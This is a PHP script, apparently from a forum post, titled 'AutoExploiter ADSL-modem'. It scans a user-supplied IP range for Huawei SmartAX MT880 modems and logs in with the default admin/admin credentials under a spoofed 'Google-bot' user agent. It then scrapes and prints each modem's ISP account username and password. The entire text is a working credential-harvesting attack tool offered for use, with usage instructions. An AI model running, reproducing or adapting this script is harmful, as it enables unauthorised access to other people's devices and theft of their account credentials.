Code: <? #!/usr/bin/php error_reporting(0); set_time_limit(0); if ($argc<3) { print "[==============================================]\n"; print "[ AutoExploiter ADSL-modem beta 0.1 ]\n"; print "[ Grab account [ FreeInet ] ]\n"; print "[ Modem target: HUAWEI SmartAX MT880 ]\n"; print "[ Author: PowerWMZ / Date: 10/08/2008 ]\n"; print "[==============================================]\n"; print "USAGE:\n"; print " [start_ip] - Start target ip\n"; print " [end_ip] - End target ip\n"; print "SIMPLE:\n"; print " ]$ php {$argv[0]} 192.168.0.1 192.168.12.254\n"; print "\n"; die; } $start = $argv[1]; $end = $argv[2]; print "[+] Grab accounts... "; $i=ip2long($start); while($i<=ip2long($end)) { $ip = long2ip($i); $auth_sock = fsockopen($ip, 80, $error, $errstr, 3); if($auth_sock==false){} else { $user = "admin"; $pass = "admin"; $breq = "GET /WAN.html HTTP/1.0\r\n"; $breq .= "Host: ".$ip."\r\n"; $breq .= "User-Agent: Google-bot\r\n"; $breq .= "Content-Type: text/html; charset=utf-8\r\n"; $breq .= "Connection: Keep-Alive\r\n"; $breq .= "Authorization: Basic ".base64_encode($user.":".$pass)."\r\n\r\n"; unset($buff); fputs($auth_sock, $breq); while (!feof($auth_sock)) { $buff[] = fgets($auth_sock,1024); } if (array_key_exists(336, $buff)) { $sum[0] = $buff[336]; $sum[1] = $buff[338]; $x=0; while($x < 2){ $s = strstr($sum[$x],'VALUE='); $nm = strpos($s,'onBlur='); $result = substr($s,7,$nm - 7); $check[] = preg_replace("|\"|", "", $result); $x++; } print "\n[-] Ip: ".$ip." | "; print "Username: ".$check[0]." | "; print "Password: ".$check[1]; } } fclose($auth_sock); $i++; } print "\n[!] Done!\n"; ?> use script: Code: php.exe script.php 192.168.0.1 192.168.12.254
